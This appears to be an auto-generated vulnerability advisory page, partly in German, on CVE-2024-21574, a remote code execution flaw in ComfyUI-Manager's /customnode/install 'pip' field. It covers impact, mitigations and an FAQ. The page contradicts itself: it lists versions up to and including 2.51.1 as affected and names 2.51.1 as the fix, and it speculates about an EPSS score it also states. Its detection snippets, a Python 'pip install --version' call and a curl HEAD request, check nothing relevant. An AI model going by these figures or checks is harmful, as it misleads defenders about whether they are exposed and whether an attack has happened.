Plattform
python
Komponente
comfyui-manager
Behoben in
2.51.1
CVE-2024-21574 describes a remote code execution (RCE) vulnerability in ComfyUI-Manager, a Python-based application. This vulnerability arises from insufficient validation of the 'pip' field within a POST request to the /customnode/install endpoint, which is used for installing custom nodes. Successful exploitation allows an attacker to trigger a pip install on a user-controlled package or URL, leading to arbitrary code execution on the server. Affected versions include 0.0.0 up to and including 2.51.1; upgrading to version 2.51.1 resolves the issue.
The impact of CVE-2024-21574 is severe. An attacker who successfully exploits this vulnerability can achieve complete control over the ComfyUI-Manager server. This includes the ability to execute arbitrary commands, install malware, steal sensitive data, and potentially pivot to other systems on the network. The vulnerability's reliance on the pip package installer makes it particularly dangerous, as attackers can leverage malicious packages from compromised repositories or even host their own. Given ComfyUI-Manager's use in AI workflows, this could lead to data poisoning or the execution of unauthorized AI models, further expanding the potential damage. The lack of input validation directly enables this RCE, making it a high-priority concern.
CVE-2024-21574 was publicly disclosed on December 12, 2024. The vulnerability's simplicity and the widespread use of pip make it a likely candidate for exploitation. While no public proof-of-concept (PoC) has been widely reported, the ease of crafting a malicious pip command suggests that one could emerge quickly. The EPSS score is likely to be assessed as medium to high, given the RCE nature and the relative ease of exploitation. It is not currently listed on the CISA KEV catalog.
Organizations and individuals utilizing ComfyUI-Manager for AI workflows, particularly those with exposed instances or those allowing custom node installations from untrusted sources, are at significant risk. Shared hosting environments where multiple users share the same ComfyUI-Manager instance are especially vulnerable, as an attacker could potentially compromise the entire environment through a single user's custom node installation.
• linux / server:
journalctl -u comfyui-manager -g 'pip install' | grep -i error• python / supply-chain:
import subprocess
result = subprocess.run(['pip', 'install', '--version'], capture_output=True, text=True)
print(result.stdout)• generic web:
curl -I http://<comfyui_manager_ip>/customnode/install | grep 'pip'disclosure
Exploit-Status
EPSS
7.10% (91% Perzentil)
CISA SSVC
CVSS-Vektor
The primary mitigation for CVE-2024-21574 is to immediately upgrade ComfyUI-Manager to version 2.51.1 or later. If upgrading is not immediately feasible due to compatibility concerns or breaking changes, consider implementing temporary workarounds. Restrict network access to the /customnode/install endpoint to trusted sources only. Implement a Web Application Firewall (WAF) with rules to block requests containing suspicious or malicious pip commands. Carefully review and validate any custom node installations before applying them. Monitor system logs for unusual pip activity or unexpected process executions. While a direct detection signature is difficult without deeper analysis of the pip install process, monitor for the execution of unusual Python scripts or the installation of unexpected packages.
Aktualisieren Sie ComfyUI-Manager auf Version 2.51.1 oder höher. Diese Version behebt die Remote Code Execution-Schwachstelle, indem sie das 'pip'-Feld in der POST-Anfrage an den /customnode/install-Endpunkt korrekt validiert. Um zu aktualisieren, verwenden Sie den Python-Paketmanager (pip) oder befolgen Sie die Anweisungen des Plugin-Entwicklers.
Schwachstellenanalysen und kritische Warnungen direkt in deinen Posteingang.
CVE-2024-21574 is a critical remote code execution vulnerability in ComfyUI-Manager versions 0.0.0 through 2.51.1. It allows attackers to execute arbitrary code by exploiting a missing input validation in the /customnode/install endpoint.
You are affected if you are running ComfyUI-Manager versions 0.0.0 to 2.51.1. Immediately upgrade to version 2.51.1 or later to mitigate the risk.
The recommended fix is to upgrade ComfyUI-Manager to version 2.51.1 or later. If upgrading is not immediately possible, restrict access to the /customnode/install endpoint and implement WAF rules.
While no widespread exploitation has been confirmed, the vulnerability's ease of exploitation suggests it is a likely target. Monitor your systems closely for suspicious activity.
Refer to the ComfyUI-Manager project's official repository and release notes for the latest information and security advisories.
Lade deine Abhängigkeitsdatei hoch und erfahre sofort, ob dich diese und andere CVEs treffen.
Lade deine requirements.txt-Datei hoch und wir sagen dir sofort, ob du betroffen bist.